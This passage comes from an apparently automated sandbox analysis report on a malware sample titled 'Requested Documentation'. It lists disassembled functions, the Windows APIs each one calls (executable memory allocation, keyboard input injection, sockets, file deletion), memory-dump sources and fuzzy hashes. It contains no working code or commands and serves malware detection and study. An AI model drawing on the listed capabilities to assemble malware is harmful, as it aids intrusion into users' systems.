                                                                              • Instruction Fuzzy Hash: DAD01271C4410DFBC711D7909899EF973BCA70A301F140D66B402A2141E239C755EA6A
                                                                              Function 009D717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2287ac65dbcbedc6f501551c26fbabfb791d985c6080544f3f079417ba5f1a74
                                                                              • Instruction ID: 644f550b97e5d0a9fbc5b0cd85a8a5b5dc90696c679b928cb9416d8f7fe39a29
                                                                              • Opcode Fuzzy Hash: 2287ac65dbcbedc6f501551c26fbabfb791d985c6080544f3f079417ba5f1a74
                                                                              • Instruction Fuzzy Hash: 21C13B74A44216EFCB14CF94C884AAEFBB9FF48714B158599E805EB361E730ED81DB90
                                                                              Function 009FE02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharLowerBuffW.USER32(?,?), ref: 009FE0BE
                                                                              • CharLowerBuffW.USER32(?,?), ref: 009FE101
                                                                                • Part of subcall function 009FD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 009FD7C5
                                                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 009FE301
                                                                              • _memmove.LIBCMT ref: 009FE314
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                                                              • String ID:
                                                                              • API String ID: 3659485706-0
                                                                              • Opcode ID: 7da3d4ae2deaee63693b7fe0be04ba996a783b2c5d8073c9d9fe8f5f24c17c8c
                                                                              • Instruction ID: 7cc60cdcf2a03c5763cf34ea914b40571d295908e011000fcfa086938a8caf1c
                                                                              • Opcode Fuzzy Hash: 7da3d4ae2deaee63693b7fe0be04ba996a783b2c5d8073c9d9fe8f5f24c17c8c
                                                                              • Instruction Fuzzy Hash: EAC159716083059FC714DF28C480A6ABBE4FF89718F14896EF9999B361D731E946CB82
                                                                              Function 009F8093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 009F80C3
                                                                              • CoUninitialize.OLE32 ref: 009F80CE
                                                                                • Part of subcall function 009DD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009DD5D4
                                                                              • VariantInit.OLEAUT32(?), ref: 009F80D9
                                                                              • VariantClear.OLEAUT32(?), ref: 009F83AA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                              • String ID:
                                                                              • API String ID: 780911581-0
                                                                              • Opcode ID: bc3161ffc5bab326d5102d7c7a98863806a18f2e2b687dea4f0f65c042702471
                                                                              • Instruction ID: 4cb9db714653394e2acaf084a79080a23bcd5a983b5dc995e4d23e10868cb801
                                                                              • Opcode Fuzzy Hash: bc3161ffc5bab326d5102d7c7a98863806a18f2e2b687dea4f0f65c042702471
                                                                              • Instruction Fuzzy Hash: 2FA158356047059FCB50EF54C881B6AB7E4BF89764F08484CFA969B3A1CB34ED05CB82
                                                                              Function 009D7530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00A12C7C,?), ref: 009D76EA
                                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00A12C7C,?), ref: 009D7702
                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,00A0FB80,000000FF,?,00000000,00000800,00000000,?,00A12C7C,?), ref: 009D7727
                                                                              • _memcmp.LIBCMT ref: 009D7748
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FromProg$FreeTask_memcmp
                                                                              • String ID:
                                                                              • API String ID: 314563124-0
                                                                              • Opcode ID: 1f8fc486b669bf13ebb262982feb73b3925a26668d4a06cfdd1aab9617616a5e
                                                                              • Instruction ID: f039808182db8d0e788ccf724070f96f7e738d057243ad35df1f7184de96ebea
                                                                              • Opcode Fuzzy Hash: 1f8fc486b669bf13ebb262982feb73b3925a26668d4a06cfdd1aab9617616a5e
                                                                              • Instruction Fuzzy Hash: 56812A75A00109EFCB00DFE4C984EEEB7B9FF89315F208559E505AB250EB71AE06CB61
                                                                              Function 009D687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$AllocClearCopyInitString
                                                                              • String ID:
                                                                              • API String ID: 2808897238-0
                                                                              • Opcode ID: 1eff19255f1f6088e668a4a4053f40784d43c88b8e5afedd23648fc6d146b01b
                                                                              • Instruction ID: cf989053f8722e6e0d4627d27e262aca065d2a49c351b0083d0c3e9b74ab7298
                                                                              • Opcode Fuzzy Hash: 1eff19255f1f6088e668a4a4053f40784d43c88b8e5afedd23648fc6d146b01b
                                                                              • Instruction Fuzzy Hash: 6851A0747843029EDB24EF65D895B3AB3E9AF85310F20D81FE5D6EB392DA74D8808701
                                                                              Function 00A097F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowRect.USER32(0135ECD8,?), ref: 00A09863
                                                                              • ScreenToClient.USER32(00000002,00000002), ref: 00A09896
                                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00A09903
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ClientMoveRectScreen
                                                                              • String ID:
                                                                              • API String ID: 3880355969-0
                                                                              • Opcode ID: 105be48858937f1eee6fb4ddfeedcda5ff4630535bbe5526fa8c9926d29af060
                                                                              • Instruction ID: e2bb090f050d032124ff5c34087fbadb53dd8a4c2174dc1526ddf9d58cb7dcd1
                                                                              • Opcode Fuzzy Hash: 105be48858937f1eee6fb4ddfeedcda5ff4630535bbe5526fa8c9926d29af060
                                                                              • Instruction Fuzzy Hash: 86514E34A00209EFDF14DF64D980AAE7BB5FF55360F148169F865AB3A1D731AD42CB90
                                                                              Function 009D9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 009D9AD2
                                                                              • __itow.LIBCMT ref: 009D9B03
                                                                                • Part of subcall function 009D9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 009D9DBE
                                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 009D9B6C
                                                                              • __itow.LIBCMT ref: 009D9BC3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$__itow
                                                                              • String ID:
                                                                              • API String ID: 3379773720-0
                                                                              • Opcode ID: 941b0db6d832c103fd8b95276fecb52066ce6039686d4bd0611ab84559c98cf7
                                                                              • Instruction ID: b80bb8323cf10cbe071586b09fd1f622641bed299eecfe3e6afa3460b4bf24ad
                                                                              • Opcode Fuzzy Hash: 941b0db6d832c103fd8b95276fecb52066ce6039686d4bd0611ab84559c98cf7
                                                                              • Instruction Fuzzy Hash: 69416E74A40208ABDF21FF54D845BEEBBB9EF85714F00406AF905A7391DB749A44CBA1
                                                                              Function 009F69AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 009F69D1
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 009F69E1
                                                                                • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
                                                                                • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
                                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 009F6A45
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 009F6A51
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$__itow__swprintfsocket
                                                                              • String ID:
                                                                              • API String ID: 2214342067-0
                                                                              • Opcode ID: 695b03f7075583fd5c5658977a77cfc93b094207d6b3b9486539af3a0333624a
                                                                              • Instruction ID: 700c044595bec6f8f4ad3df7492c35421c192770fdb59f3621290a9f844fd144
                                                                              • Opcode Fuzzy Hash: 695b03f7075583fd5c5658977a77cfc93b094207d6b3b9486539af3a0333624a
                                                                              • Instruction Fuzzy Hash: F5418E75740204AFEB60BF64CC86F7A77A89B84B14F48C41CFA59AF3D2DA719D018B91
                                                                              Function 009F641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00A0F910), ref: 009F64A7
                                                                              • _strlen.LIBCMT ref: 009F64D9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _strlen
                                                                              • String ID:
                                                                              • API String ID: 4218353326-0
                                                                              • Opcode ID: 42f3b83da6cf22a57422f665c8aa00363c24e0ec957bf01983bbb19b27e75004
                                                                              • Instruction ID: b0f3639bf8c7d1b23e40081a0770c6aa91e8f49c084e890f8516ea88cdef863c
                                                                              • Opcode Fuzzy Hash: 42f3b83da6cf22a57422f665c8aa00363c24e0ec957bf01983bbb19b27e75004
                                                                              • Instruction Fuzzy Hash: 42419531600208AFCB14FBA8DC95FBEB7A9AF84314F148559F919AB392DB30AD05CB50
                                                                              Function 009EB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 009EB89E
                                                                              • GetLastError.KERNEL32(?,00000000), ref: 009EB8C4
                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009EB8E9
                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009EB915
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 3321077145-0
                                                                              • Opcode ID: a930319cc891fb5912da5da68a5ea4789db2f41bbbcc10095b009405aa40ac06
                                                                              • Instruction ID: 8207bd27a5346a2786cfe6ba09f990473aa8e05437e2c2da9d7118334914c08c
                                                                              • Opcode Fuzzy Hash: a930319cc891fb5912da5da68a5ea4789db2f41bbbcc10095b009405aa40ac06
                                                                              • Instruction Fuzzy Hash: 64413D35600555DFCB11EF15C484A6EBBE5EF89314F098098ED4AAB762CB30FD02DB91
                                                                              Function 00A08851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A088DE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: InvalidateRect
                                                                              • String ID:
                                                                              • API String ID: 634782764-0
                                                                              • Opcode ID: 21c05e00ec4e4e3c84139378715bcbbeff3aa2d8b8b41417212eeb1d60cb1241
                                                                              • Instruction ID: bec621cd5c5750f19fb493b4731341e28e3f6bdc850fbfe6421c4f0991eca09b
                                                                              • Opcode Fuzzy Hash: 21c05e00ec4e4e3c84139378715bcbbeff3aa2d8b8b41417212eeb1d60cb1241
                                                                              • Instruction Fuzzy Hash: 0231C634A0010CEFEF20AB68EC85BBC77B5EB05390F544112F991E72E1CE79E9459B5A
                                                                              Function 00A0AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ClientToScreen.USER32(?,?), ref: 00A0AB60
                                                                              • GetWindowRect.USER32(?,?), ref: 00A0ABD6
                                                                              • PtInRect.USER32(?,?,00A0C014), ref: 00A0ABE6
                                                                              • MessageBeep.USER32(00000000), ref: 00A0AC57
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 1352109105-0
                                                                              • Opcode ID: b45522b16abd218f88b1ab8c47cb183ee8f6dc6e674ea5d9d969fd8152848cee
                                                                              • Instruction ID: 9303538539d94f1bd35922fc8422ea21e8cb94b1065d29177e3117a174486028
                                                                              • Opcode Fuzzy Hash: b45522b16abd218f88b1ab8c47cb183ee8f6dc6e674ea5d9d969fd8152848cee
                                                                              • Instruction Fuzzy Hash: 8841B134A0021CDFDB21DF98E884B997BF5FF59300F1580A9E815DB2A1D731E842DB92
                                                                              Function 009E0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 009E0B27
                                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 009E0B43
                                                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 009E0BA9
                                                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 009E0BFB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                              • String ID:
                                                                              • API String ID: 432972143-0
                                                                              • Opcode ID: 2ce66e47a1cabcc4a7cf43f4d3dd44285606c8f3d034d8ad6165ab8a0b283e54
                                                                              • Instruction ID: 12f2ab28a37c0fe0035a0b0236b03c3a76072358505ebcefff4840473562fd29
                                                                              • Opcode Fuzzy Hash: 2ce66e47a1cabcc4a7cf43f4d3dd44285606c8f3d034d8ad6165ab8a0b283e54
                                                                              • Instruction Fuzzy Hash: 26315730940288AEFF328B668C05BFEBBADBBC4314F0C426AE481521D1C3F88DD19751
                                                                              Function 009E0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 009E0C66
                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 009E0C82
                                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 009E0CE1
                                                                              • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 009E0D33
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                              • String ID:
                                                                              • API String ID: 432972143-0
                                                                              • Opcode ID: aabbc49f3a0f54d6ae15489d7604e3cea15cbdbe9428b0d8433a1f1a39507d38
                                                                              • Instruction ID: b9b7682bb2e050fba99cb4ac075ae9c3876bb390141f066bd025fc3e992fafc5
                                                                              • Opcode Fuzzy Hash: aabbc49f3a0f54d6ae15489d7604e3cea15cbdbe9428b0d8433a1f1a39507d38
                                                                              • Instruction Fuzzy Hash: 32313730940388AEFF328B668C157BEBB6AABC5310F14871AE4C1621D1C3B99DD68752
                                                                              Function 009B61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009B61FB
                                                                              • __isleadbyte_l.LIBCMT ref: 009B6229
                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009B6257
                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009B628D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                              • String ID:
                                                                              • API String ID: 3058430110-0
                                                                              • Opcode ID: 817e036653858e5e6398a7523efa318ba7be104fe84ea88ae2ed001239a144b9
                                                                              • Instruction ID: 5cbc966da7ff9006b02e44201cc8a2c2e1fd8f1a18aa01129df547620896437d
                                                                              • Opcode Fuzzy Hash: 817e036653858e5e6398a7523efa318ba7be104fe84ea88ae2ed001239a144b9
                                                                              • Instruction Fuzzy Hash: F931C131604246AFEF218F68CD48BFA7BA9FF42320F154528E864D7191E734E951DB90
                                                                              Function 00A04EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetForegroundWindow.USER32 ref: 00A04F02
                                                                                • Part of subcall function 009E3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009E365B
                                                                                • Part of subcall function 009E3641: GetCurrentThreadId.KERNEL32 ref: 009E3662
                                                                                • Part of subcall function 009E3641: AttachThreadInput.USER32(00000000,?,009E5005), ref: 009E3669
                                                                              • GetCaretPos.USER32(?), ref: 00A04F13
                                                                              • ClientToScreen.USER32(00000000,?), ref: 00A04F4E
                                                                              • GetForegroundWindow.USER32 ref: 00A04F54
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
